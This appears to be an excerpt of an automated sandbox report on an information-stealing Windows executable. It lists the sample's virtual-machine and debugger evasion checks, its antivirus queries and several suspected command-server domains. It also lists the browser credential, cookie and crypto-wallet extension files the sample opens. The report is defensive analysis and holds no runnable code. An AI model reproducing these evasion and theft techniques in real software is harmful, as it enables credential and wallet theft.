                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888743317.0000000000595000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk5<Jz
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888743317.0000000000595000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: zLP3oiwG1g.exe, 00000000.00000003.1395685842.00000000051CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: SICE
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: bashfulacid.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: tentabatte.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: curverpluch.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: talkynicer.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: shapestickyr.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: manyrestro.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: slipperyloo.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: wordyfindy.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: observerfry.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1889746631.00000000005D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: N/Program Manager
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1470419728.0000000005218000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: zLP3oiwG1g.exe PID: 7300, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: zLP3oiwG1g.exeString found in binary or memory: :0,"p":"%appdata%\\Electrum\\wallets
                Source: zLP3oiwG1g.exeString found in binary or memory: Wallets/ElectronCash
                Source: zLP3oiwG1g.exeString found in binary or memory: window-state.json
                Source: zLP3oiwG1g.exe, 00000000.00000003.1418572620.000000000038C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: zLP3oiwG1g.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: zLP3oiwG1g.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: zLP3oiwG1g.exeString found in binary or memory: Wallets/Ethereum
                Source: zLP3oiwG1g.exe, 00000000.00000003.1445598270.000000000036C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000036D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%ap
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
